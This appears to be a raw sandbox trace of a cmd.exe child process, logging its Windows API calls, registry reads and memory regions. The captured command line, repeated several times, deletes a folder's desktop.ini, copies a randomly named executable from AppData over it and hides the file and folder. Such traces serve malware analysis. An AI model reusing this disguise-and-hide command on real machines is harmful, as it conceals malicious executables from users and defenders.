_get_osfhandle (_FileHandle=4) returned 0x54 [0130.737] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df28 | out: lpNewFilePointer=0x0) returned 1 [0130.737] _close (_FileHandle=4) returned 0 [0130.738] FindNextFileW (in: hFindFile=0x2e0e78, lpFindFileData=0x22efbc | out: lpFindFileData=0x22efbc) returned 0 [0130.738] GetLastError () returned 0x12 [0130.738] FindClose (in: hFindFile=0x2e0e78 | out: hFindFile=0x2e0e78) returned 1 [0130.739] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0130.739] _close (_FileHandle=3) returned 0 [0130.739] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.739] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0130.739] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.739] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0130.739] _get_osfhandle (_FileHandle=0) returned 0x3 [0130.739] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0130.740] SetConsoleInputExeNameW () returned 0x1 [0130.740] GetConsoleOutputCP () returned 0x1b5 [0130.740] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0130.740] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.740] exit (_Code=0) Process: id = "101" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168a0" os_pid = "0x848" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11588 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11589 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 11590 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 11591 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 11592 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11593 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11594 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11595 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11596 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 11597 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 11646 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11647 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11648 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11649 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 11650 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 11651 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 11652 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11653 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 11654 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11655 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11656 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11657 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 11658 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11659 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 11660 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 11661 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11662 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 11663 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 11664 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 11665 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 11666 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 11667 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 11668 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 11669 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 11699 start_va = 0x12d0000 end_va = 0x159efff entry_point = 0x12d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 158 os_tid = 0x858 [0130.650] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fe64 | out: lpSystemTimeAsFileTime=0x12fe64*(dwLowDateTime=0x87ced1e0, dwHighDateTime=0x1d440a9)) [0130.650] GetCurrentProcessId () returned 0x848 [0130.650] GetCurrentThreadId () returned 0x858 [0130.650] GetTickCount () returned 0x29b45 [0130.650] QueryPerformanceCounter (in: lpPerformanceCount=0x12fe5c | out: lpPerformanceCount=0x12fe5c*=18743940314) returned 1 [0130.651] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0130.651] __set_app_type (_Type=0x1) [0130.651] __p__fmode () returned 0x76b331f4 [0130.651] __p__commode () returned 0x76b331fc [0130.651] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0130.651] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0130.652] GetCurrentThreadId () returned 0x858 [0130.652] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x858) returned 0x38 [0130.652] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0130.652] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0130.652] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.652] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0130.652] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fdf4 | out: phkResult=0x12fdf4*=0x0) returned 0x2 [0130.652] VirtualQuery (in: lpAddress=0x12fe2b, lpBuffer=0x12fdc4, dwLength=0x1c | out: lpBuffer=0x12fdc4*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.652] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fdc4, dwLength=0x1c | out: lpBuffer=0x12fdc4*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0130.652] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fdc4, dwLength=0x1c | out: lpBuffer=0x12fdc4*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0130.652] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fdc4, dwLength=0x1c | out: lpBuffer=0x12fdc4*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.652] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fdc4, dwLength=0x1c | out: lpBuffer=0x12fdc4*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0130.652] GetConsoleOutputCP () returned 0x1b5 [0130.652] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0130.653] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0130.653] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.653] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0130.653] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.653] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0130.653] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.653] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0130.653] _get_osfhandle (_FileHandle=0) returned 0x3 [0130.653] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0130.654] _get_osfhandle (_FileHandle=0) returned 0x3 [0130.654] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0130.654] GetEnvironmentStringsW () returned 0x2004a0* [0130.654] FreeEnvironmentStringsW (penv=0x2004a0) returned 1 [0130.654] GetEnvironmentStringsW () returned 0x2004a0* [0130.654] FreeEnvironmentStringsW (penv=0x2004a0) returned 1 [0130.654] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ed64 | out: phkResult=0x12ed64*=0x40) returned 0x0 [0130.654] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ed6c, lpData=0x12ed70, lpcbData=0x12ed68*=0x1000 | out: lpType=0x12ed6c*=0x0, lpData=0x12ed70*=0x50, lpcbData=0x12ed68*=0x1000) returned 0x2 [0130.654] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ed6c, lpData=0x12ed70, lpcbData=0x12ed68*=0x1000 | out: lpType=0x12ed6c*=0x4, lpData=0x12ed70*=0x1, lpcbData=0x12ed68*=0x4) returned 0x0 [0130.654] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ed6c, lpData=0x12ed70, lpcbData=0x12ed68*=0x1000 | out: lpType=0x12ed6c*=0x0, lpData=0x12ed70*=0x1, lpcbData=0x12ed68*=0x1000) returned 0x2 [0130.654] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ed6c, lpData=0x12ed70, lpcbData=0x12ed68*=0x1000 | out: lpType=0x12ed6c*=0x4, lpData=0x12ed70*=0x0, lpcbData=0x12ed68*=0x4) returned 0x0 [0130.654] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ed6c, lpData=0x12ed70, lpcbData=0x12ed68*=0x1000 | out: lpType=0x12ed6c*=0x4, lpData=0x12ed70*=0x40, lpcbData=0x12ed68*=0x4) returned 0x0 [0130.655] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ed6c, lpData=0x12ed70, lpcbData=0x12ed68*=0x1000 | out: lpType=0x12ed6c*=0x4, lpData=0x12ed70*=0x40, lpcbData=0x12ed68*=0x4) returned 0x0 [0130.655] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ed6c, lpData=0x12ed70, lpcbData=0x12ed68*=0x1000 | out: lpType=0x12ed6c*=0x0, lpData=0x12ed70*=0x40, lpcbData=0x12ed68*=0x1000) returned 0x2 [0130.655] RegCloseKey (hKey=0x40) returned 0x0 [0130.655] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ed64 | out: phkResult=0x12ed64*=0x40) returned 0x0 [0130.655] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ed6c, lpData=0x12ed70, lpcbData=0x12ed68*=0x1000 | out: lpType=0x12ed6c*=0x0, lpData=0x12ed70*=0x40, lpcbData=0x12ed68*=0x1000) returned 0x2 [0130.655] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ed6c, lpData=0x12ed70, lpcbData=0x12ed68*=0x1000 | out: lpType=0x12ed6c*=0x4, lpData=0x12ed70*=0x1, lpcbData=0x12ed68*=0x4) returned 0x0 [0130.655] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ed6c, lpData=0x12ed70, lpcbData=0x12ed68*=0x1000 | out: lpType=0x12ed6c*=0x0, lpData=0x12ed70*=0x1, lpcbData=0x12ed68*=0x1000) returned 0x2 [0130.655] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ed6c, lpData=0x12ed70, lpcbData=0x12ed68*=0x1000 | out: lpType=0x12ed6c*=0x4, lpData=0x12ed70*=0x0, lpcbData=0x12ed68*=0x4) returned 0x0 [0130.655] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ed6c, lpData=0x12ed70, lpcbData=0x12ed68*=0x1000 | out: lpType=0x12ed6c*=0x4, lpData=0x12ed70*=0x9, lpcbData=0x12ed68*=0x4) returned 0x0 [0130.655] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ed6c, lpData=0x12ed70, lpcbData=0x12ed68*=0x1000 | out: lpType=0x12ed6c*=0x4, lpData=0x12ed70*=0x9, lpcbData=0x12ed68*=0x4) returned 0x0 [0130.655] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ed6c, lpData=0x12ed70, lpcbData=0x12ed68*=0x1000 | out: lpType=0x12ed6c*=0x0, lpData=0x12ed70*=0x9, lpcbData=0x12ed68*=0x1000) returned 0x2 [0130.655] RegCloseKey (hKey=0x40) returned 0x0 [0130.655] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886365 [0130.655] srand (_Seed=0x5b886365) [0130.655] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\"" [0130.655] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\"" [0130.655] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.656] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x201c00, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0130.656] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0130.656] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0130.656] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0130.656] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0130.656] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0130.656] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0130.656] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0130.656] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0130.656] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0130.656] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0130.656] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0130.656] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0130.656] GetEnvironmentStringsW () returned 0x2025f0* [0130.657] FreeEnvironmentStringsW (penv=0x2025f0) returned 1 [0130.657] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.657] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0130.657] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0130.657] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0130.657] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0130.657] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0130.657] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0130.657] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0130.657] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0130.657] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0130.657] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12fb30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.657] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12fb30, lpFilePart=0x12fb2c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12fb2c*="Desktop") returned 0x18 [0130.657] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0130.657] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f8ac | out: lpFindFileData=0x12f8ac) returned 0x200c80 [0130.657] FindClose (in: hFindFile=0x200c80 | out: hFindFile=0x200c80) returned 1 [0130.658] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f8ac | out: lpFindFileData=0x12f8ac) returned 0x200c80 [0130.658] FindClose (in: hFindFile=0x200c80 | out: hFindFile=0x200c80) returned 1 [0130.658] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f8ac | out: lpFindFileData=0x12f8ac) returned 0x200c80 [0130.658] FindClose (in: hFindFile=0x200c80 | out: hFindFile=0x200c80) returned 1 [0130.658] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0130.658] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0130.658] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0130.658] GetEnvironmentStringsW () returned 0x2004a0* [0130.658] FreeEnvironmentStringsW (penv=0x2004a0) returned 1 [0130.658] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.659] GetConsoleOutputCP () returned 0x1b5 [0130.659] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0130.659] GetUserDefaultLCID () returned 0x409 [0130.659] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0130.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12fc70, cchData=128 | out: lpLCData="0") returned 2 [0130.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12fc70, cchData=128 | out: lpLCData="0") returned 2 [0130.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12fc70, cchData=128 | out: lpLCData="1") returned 2 [0130.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0130.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0130.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0130.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0130.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0130.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0130.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0130.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0130.660] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0130.660] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0130.660] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0130.661] GetConsoleTitleW (in: lpConsoleTitle=0x1f0ac8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.662] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0130.662] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0130.662] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0130.662] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0130.663] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0130.663] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0130.663] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0130.663] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0130.663] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0130.663] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0130.663] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0130.666] _wcsicmp (_String1="del", _String2=")") returned 59 [0130.666] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0130.666] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0130.666] _wcsicmp (_String1="IF", _String2="del") returned 5 [0130.666] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0130.666] _wcsicmp (_String1="REM", _String2="del") returned 14 [0130.666] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0130.668] _wcsicmp (_String1="type", _String2=")") returned 75 [0130.668] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0130.668] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0130.668] _wcsicmp (_String1="IF", _String2="type") returned -11 [0130.668] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0130.668] _wcsicmp (_String1="REM", _String2="type") returned -2 [0130.668] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0130.784] SetErrorMode (uMode=0x0) returned 0x0 [0130.784] SetErrorMode (uMode=0x1) returned 